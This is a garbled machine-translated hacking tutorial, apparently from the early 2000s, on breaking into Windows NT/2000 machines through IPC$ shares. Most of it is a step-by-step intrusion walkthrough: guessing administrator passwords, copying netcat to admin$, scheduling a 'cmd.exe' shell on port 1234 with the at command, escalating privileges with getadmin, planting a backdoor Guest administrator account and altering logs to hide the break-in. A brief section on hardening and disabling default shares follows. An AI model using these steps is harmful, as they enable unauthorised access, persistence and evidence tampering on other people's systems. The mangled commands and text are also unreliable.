IPC invading full Raiders
IPC is an abbreviation of Internet Process Connection, that is, a remote network connection. It is a one-character feature that Windows NT and Windows 2000, which is characterized by only one connection between two IPs. Ok, talk less, now enter the theme.
How do I find a host with IPC vulnerability? I used to combine a foreign scan tool (name I forgot) and Killusa's Letmein, because many work is done, so speed can be imagined. Now because there is a lot of flow light 2000, it is too simple to find such a host. If I don't say it, you can refer to the documentation of the software.
Ok, suppose we have found a host, the address is 139.223.200.xxx, the administrator account is administrator, the password is 123456. Enter the command line method, formally start. It should be noted that the following operations are performed in the target host without disabled remote IPC $ connection and starting the Schedule service.
F: /> NET Use //139.223.200.xxx/IPC ("123456" / user: "administrator" command successfully completed.
F: /> Copy nc.exe //139.223.200.xxx/admin full files have been copied.
F: /> Net time //139.223.200.xxx //139.223.200.xxx's current time is 2000/12/25 10:25 am in //139.223.200.xx's local time (GMT - 07:00 ) Is 2000/12/25 at 10:35 am to successfully complete.
F: /> at //139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe added a job, its job ID = 0
F: /> Telnet 139.223.200.xxx 1234
The above command is simple, you can use the use of Net, AT, and NC. In this way, we boarded the remote host. The ideal situation is like this, but maybe you will encounter the SCHEDULE service of the target host without starting, then the AT command cannot be used, we need to add the following steps.
F: /> at //139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe service has not started.
F: /> Netsvc //139.223.200.xxx Schedule / Start Service IS Running on //139.223.200.xxx
What can we do after boarding the remote host? This is determined depending on the permissions of this account and the security policy of the host. If your permissions are not enough, you can try the steps below. First, the following command is executed locally.
F: /> Copy getadmin.exe //139.223.200.xxx/admin $ Add 1 file.
F: /> Copy Gasys.dll //139.223.200.xxx/admin $ The 1 file is copied.
Second, run the following command at the remote host.
C: / Winnt / System32> GetMin
If you succeed, you are the administrator of this host, the permissions are big enough? :-)
So what can we do now? Change the homepage? Download SAM database? Can! There are a lot of methods, I will not say one, the specific method can refer to the relevant tutorial. I generally be interested in the Word document and database on the target host, huh, huh. . . In fact, if you put a Trojan or a virus on this machine, it is easier to do things, but I think if you have no deep hatred, or don't do this, this is not good.
After doing things you have to do, don't forget to make a back door.
C: / Winnt / System32> Net User Guest 30906766 Net Use Guest 30906766 The Command Completed SuccessFully.
C: / Winnt / System32> Net localGroup Administrators Guest / Add Net localGroup Administrators Guest / Add The Command Complated SuccessFully.
This is a relatively simple back door. If you want to do it, you can make a set of rootkits as you like Linux. In fact, such a Dongdong is already, you can use it. It's simple to make it now, so many fool tools you use, hehe! To be self-policy, how do you do not learn some safety knowledge?
Finally, we have to repair the log. Although the redp0wer tells me that I am very small manager to see NT's log, I want to repair it or use it. Where is the NT log? You can refer to XUDI's article. But one thing to remember is that the log can only be modified, can not be deleted, otherwise it will sell yourself! :-) The command line tool in this area is also a lot, you can go to some foreign sites to see.
In fact, there is this host, you can do more.
But though this, but I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Russen steps don't answer their confused (you just find a HACK forum to search. IPC, how much is it existing?
II: IPC $ IPC $ (Internet Process Connection) is a shared "named pipe" resource (everyone saying this), is to make the name of the name and password can be obtained by verifying the username and password Permissions, use when managing computers and views computer shared resources.
With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list).
We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $).
All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoped to achieve higher permissions, thereby achieving non-marketed purposes.
Confusion: 1) IPC connection is a remote network login function unique in Windows NT and above, which is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you can't be in Windows 9 Run in .x.
That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 uncomfortable) 2) Even if it is empty connection, it is not 100% to establish success. If the other party closes IPC $ sharing, you still have no connection.
3) It is not to say that you can view the other party's list of users, as administrators can prohibit export users.
Three establishment of IPC $ Connection in Hack Attack
As mentioned above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), access part sharing, if you can have a certain one If the user is logged in, then you will get the corresponding permissions, obviously, if you log in as an administrator, 嘿嘿, don't have to say more, what u want, u can do !!
(Basically, you can summarize the target information, managing target processes and services, uploading Trojans and running, if it is 2000 Server, you can also consider opening the terminal service convenient control. How? Be a great!)
But you don't want to be too early, because the administrator's password is not so good, although there will be some silly administrators with empty passwords or mentally ministerable passwords, but this is a few, and now it is not previous, In the improvement of people's safety awareness, the administrators have also been careful, get the administrator's password will be more difficult: (
So in the future, your biggest possibility is to connect with minimal permissions, you will slowly discover IPC $ connection is not universal, even when the host does not turn on IPC $, you can't connect.
So I think that you don't think of the IPC $ invading as an ultimate weapon, don't think it's going to fight, it is like the passball in front of the football, rarely has a fatal effect, but it is indispensable. I think this is the meaning of IPC $ connected in the Hack invasion.
Four IPC $ with empty connection, 139,445 port, default sharing relationship
The relationship between the above four may be a problem with the rookie very confused, but most of the articles have not conducted special instructions. In fact, I understand that it is not very thorough, it is summed up in communication with everyone. (A good discussion The atmosphere BBS can be said to be a rookie paradise)
1) IPC $ with empty connections:
You don't need the username and password IPC $ connection, once you log in with a user or administrator (that is, IPC $ with a specific username and password), you can't be called empty connection.
Many people may have to ask, since I can be connected, then I will open it in the future, why also spend Jiu Niu two tigers to scan the weak password, huh, huh, the reason is mentioned before, when you log in When you don't have any permissions (very depressed), and when you log in with the user or administrator, you will have the corresponding permissions (who don't want to be permissions, so still old and old, don't be lazy) . 2) IPC $ with 139,445 port:
IPC $ Connection can be remotely logged in and access to default sharing; and 139 ports are enabled by NetBIOS protocols, we can implement access to shared file / printers through 139, 445 (Win2000) port, so general, IPC $ Connection It is supported by 139 or 445 ports.
3) IPC $ with default sharing
The default sharing is to facilitate administrator remote management and the default open share (you can of course turn it off), that is, all logical disks (C $, D $, E $ ...) and system directory Winnt or Windows Admin $), we can implement access to these default sharing through IPC $ (provided that the other party does not turn off these default sharing) Five IPC $ Connection Failure The following 5 reasons are more common: 1) Your system is not NT Or the above operating system; 2) The other party does not open IPC $ default sharing 3) The other party does not open 139 or 445 port (puzzle firewall mask) 4) Your command input is incorrect (such as a space, etc.) 5) User name or password Error (empty connection is of course, it doesn't matter)
In addition, you can also analyze the reason according to the returned error number: Error number 5, refuse to access: It is likely that the users you use are not administrator privileges, first improve the permissions; the error number 51, Windows cannot find the network path: network has problems; Error number 53, I can't find the network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, find the network name: Your LanmanWorkStation service is not started; goal Deleted IPC $; error number 1219, the credentials provided with existing credentials: You have already established an IPC $ with the other party, please delete. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is more complex problem. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed and determined, it is * everyone understands and trials. Six How to open the target IPC $ (this paragraph is from related articles)
First you need to get a shell that doesn't rely on IPC $, such as SQL CMD extensions, Telnet, Trojans, of course, this shell must be admin privilege, then you can use the shell to execute the NET Share IPC $ to open the target IPC $ . From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up.
Seven How to prevent IPC $ invading
1 Prohibition of empty connections (This operation does not prevent the establishment of the empty connection, leading from "Empty Fair in Win2000") first running regedit, find the following group [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] put restrictanonymous = DWORD key value is changed to: 00000001 (If set to 2, there are some problems, such as some WIN services, problems, etc.) 2 Prohibit the default sharing 1) Take out the local shared resource Run -CMD-Enter Net Share 2) Delete Sharing (One Enter One) NET Share IPC $ / Delete Net Share Admin $ / Delete Net Share C $ / Delete Net Share D $ / Delete (if there is e, f, ... can continue to delete) 3 Stop Server Service Net Stop Server / Y (Restarting the Server service will be reopened) 4) Modify the registry running -Regedit Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] to put autoshareserver (DWord) The key value is changed to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value. 3 Permanently shut down IPC $ and default sharing dependence: LanmanServer, Server Server Service Control Panel - Administrative Tools - Services - Find Server Services - Properties - Regular - Start Type - Disabled 4 Installed Firewall (Select Related Settings), Or port filtering (filtered out 139, 445, etc.), or use a new version of the optimization master 5 to set the complex password to prevent password passing through IPC $ (this tutorial is not updated regularly, please gain the latest version, please visit the official website: Vegetable Bird Community Original http://ccbirds.yeah.net)
Eight related orders
1) Establish an empty connection: NET USE // IP / IPC $ "" / user: "" (must pay attention: This line of command contains 3 spaces) 2) Establish a non-empty connection: NET USE / / IP / IPC $ "User Name" / user: "Password" (same with 3 spaces) 3) Mapping Default Sharing: NET USE Z: // IP / C $ "Password" / user: "User Name" (ie, the other party's C drive is mapped to your own Z disk, and other disk classes can be pushed) If IPC $ has been established with the target, you can use IP disk empty $ access directly, the specific command NET USE Z: // IP / C $ 4) Delete an IPC $ / DEL 5) Remove Sharing Map NET Use C: / DEL Delete the mapped C drive, other disk classes push net use * / del delete all, will Some prompts ask to press Y confirmation
Nine classic intrusion mode
This invasion mode is too classic. Most IPC tutorials have introduced. I will also get quotes, thank former creators! (I don't know which seniors) 1. C: /> NET use //127.0.0.1 / IPC $ "/ user:" admin ", this is an IP address that uses" stream "sweeping to the user name is Administrators, password" empty "IP address (empty password? Wow, luck is good), if it is intended to attack You can use such a command to establish a connection with 127.0.0.1, because the password is "empty", so the first quotation is not entered, and a double quoter is the username. Enter administrators, command to succeed. carry out. 2. C: /> Copy Srv.exe //127.0.0.1/admin $ Copy SRV.EXE first, there is in the direction of the Tools directory ($ refers to the admin user's C: / WinNT / System32 /, You can also use C $, D $, meaning the C disk and D disk, see where you want to copy it). 3. C: /> Net Time //127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2002/3/19 11:00 am, and the command successfully completed. 4. C: /> AT //127.0.0.1 11:05 srv.exe launches SRV.exe with the AT command (the time set here is faster than the host, or how you start, huh, huh!) 5. C: /> NET TIME / / 127.0.0.1 Check time no time? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, then prepare to start the following command. 6. C: /> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party. Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM 7.c: /> Copy ntlm.exe //127.0.0.1/admin $ Add NTLM.exe to the host with a copy command (NTLM.exe is also in the "Dream" Tools directory) . 8. C: / Winnt / System32> NTLM Enter NTLM Start (here C: / Winnt / System32> refers to the other party, running NTLM actually let this program run on the other computer). When "DONE" appears, it will be normal.
